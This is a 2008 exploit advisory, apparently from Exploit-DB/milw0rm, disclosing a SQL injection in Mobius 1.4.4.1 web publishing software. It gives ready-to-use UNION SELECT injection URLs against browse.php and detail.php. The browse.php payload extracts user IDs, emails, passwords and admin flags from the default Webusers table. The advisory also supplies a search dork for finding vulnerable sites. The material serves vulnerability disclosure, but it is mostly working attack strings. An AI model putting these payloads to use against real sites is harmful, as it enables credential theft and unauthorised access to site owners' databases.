Mobius 1.4.4.1 - SQL Injection

EDB-ID:

6138


Author:

dun

Type:

webapps


Platform:

PHP

Date:

2008-07-26


  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #################################################################
 #   [ Mobius <= 1.4.4.1 ]   Remote SQL Injection Vulnerability  #
 #################################################################
 # 
 # [ Script: Mobius Web Publishing Software ]
 #
 # [ Script site: http://www.willo.com/mimsy_xg/mobius.asp ]
 # 
 # [ Default table_name with users: Webusers ]
 # 
 # [ Vuln: browse.php ] http://site.com/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/* 	
 #	
 # [ Vuln: detail.php ] http://site.com/mobius_path/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* 
 # *[ in other version of Mobius, number of columns may be different ]* 
 # 
 # [ Dork example: "This website is powered by Mobius" ]
 #
 #####################################################
 # Greetz: D3m0n_DE * Voo|doo * str0ke and otherz..
 #####################################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-07-26]